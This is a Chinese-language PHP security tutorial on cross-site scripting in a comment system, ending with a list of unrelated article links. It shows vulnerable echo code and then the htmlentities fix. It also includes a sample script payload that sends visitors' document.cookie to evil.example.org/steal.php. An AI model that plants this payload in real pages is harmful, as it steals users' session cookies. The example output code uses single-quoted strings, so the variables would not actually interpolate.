PHP安全-跨站腳本攻擊
跨站腳本攻擊是眾所周知的攻擊方式之一。所有平臺(tái)上的Web應(yīng)用都深受其擾,PHP應(yīng)用也不例外。
所有有輸入的應(yīng)用都面臨著風(fēng)險(xiǎn)。Webmail,論壇,留言本,甚至是Blog。事實(shí)上,大多數(shù)Web應(yīng)用提供輸入是出于更吸引人氣的目的,但同時(shí)這也會(huì)把自己置于危險(xiǎn)之中。如果輸入沒有正確地進(jìn)行過濾和轉(zhuǎn)義,跨站腳本漏洞就產(chǎn)生了。
以一個(gè)允許在每個(gè)頁(yè)面上錄入評(píng)論的應(yīng)用為例,它使用了下面的表單幫助用戶進(jìn)行提交:
CODE:
<form action='comment.php' method='POST' />
<p>Name: <input type='text' name='name' /><br />
Comment: <textarea name='comment' rows='10' cols='60'></textarea><br />
<input type='submit' value='Add Comment' /></p>
</form>
程序向其他訪問該頁(yè)面的用戶顯示評(píng)論。例如,類似下面的代碼段可能被用來(lái)輸出一個(gè)評(píng)論($comment)及與之對(duì)應(yīng)的發(fā)表人($name):
CODE:
<?php
echo '<p>$name writes:<br />';
echo '<blockquote>$comment</blockquote></p>';
?>
這個(gè)流程對(duì)$comment及$name的值給予了充分的信任,想象一下它們中的一個(gè)的內(nèi)容中包含如下代碼:
CODE:
<script>
document.location =
’http://evil.example.org/steal.php?cookies=’ +
document.cookie
</script>
如果你的用戶察看這個(gè)評(píng)論時(shí),這與你允許別人在你的網(wǎng)站源程序中加入Javascript代碼無(wú)異。你的用戶會(huì)在不知不覺中把他們的cookies(瀏覽網(wǎng)站的人)發(fā)送到evil.example.org,而接收程序(steal.php)可以通過$_GET[’cookies’]變量防問所有的cookies。
這是一個(gè)常見的錯(cuò)誤,主要是由于不好的編程習(xí)慣引發(fā)的。幸運(yùn)的是此類錯(cuò)誤很容易避免。由于這種風(fēng)險(xiǎn)只在你輸出了被污染數(shù)據(jù)時(shí)發(fā)生,所以只要確保做到如第一章所述的過濾輸入及轉(zhuǎn)義輸出即可
最起碼你要用htmlentities( )對(duì)任何你要輸出到客戶端的數(shù)據(jù)進(jìn)行轉(zhuǎn)義。該函數(shù)可以把所有的特殊字符轉(zhuǎn)換成HTML表示方式。所有會(huì)引起瀏覽器進(jìn)行特殊處理的字符在進(jìn)行了轉(zhuǎn)換后,就能確保顯示出來(lái)的是原來(lái)錄入的內(nèi)容。
由此,用下面的代碼來(lái)顯示評(píng)論是更安全的:
CODE:
<?php
$clean = array();
$html = array();
/* Filter Input ($name, $comment) */
$html[’name’] = htmlentities($clean[’name’], ENT_QUOTES, ’UTF-8’);
$html[’comment’] = htmlentities($clean[’comment’], ENT_QUOTES, ’UTF-8’);
echo '<p>{$html[’name’]} writes:<br />';
echo '<blockquote>{$html[’comment’]}</blockquote></p>';
?>
相關(guān)文章:
1. 用css截取字符的幾種方法詳解(css排版隱藏溢出文本)2. ASP.NET MVC遍歷驗(yàn)證ModelState的錯(cuò)誤信息3. jsp網(wǎng)頁(yè)實(shí)現(xiàn)貪吃蛇小游戲4. ASP 信息提示函數(shù)并作返回或者轉(zhuǎn)向5. CSS hack用法案例詳解6. asp中response.write("中文")或者js中文亂碼問題7. 將properties文件的配置設(shè)置為整個(gè)Web應(yīng)用的全局變量實(shí)現(xiàn)方法8. PHP設(shè)計(jì)模式中工廠模式深入詳解9. asp(vbs)Rs.Open和Conn.Execute的詳解和區(qū)別及&H0001的說明10. ASP實(shí)現(xiàn)加法驗(yàn)證碼
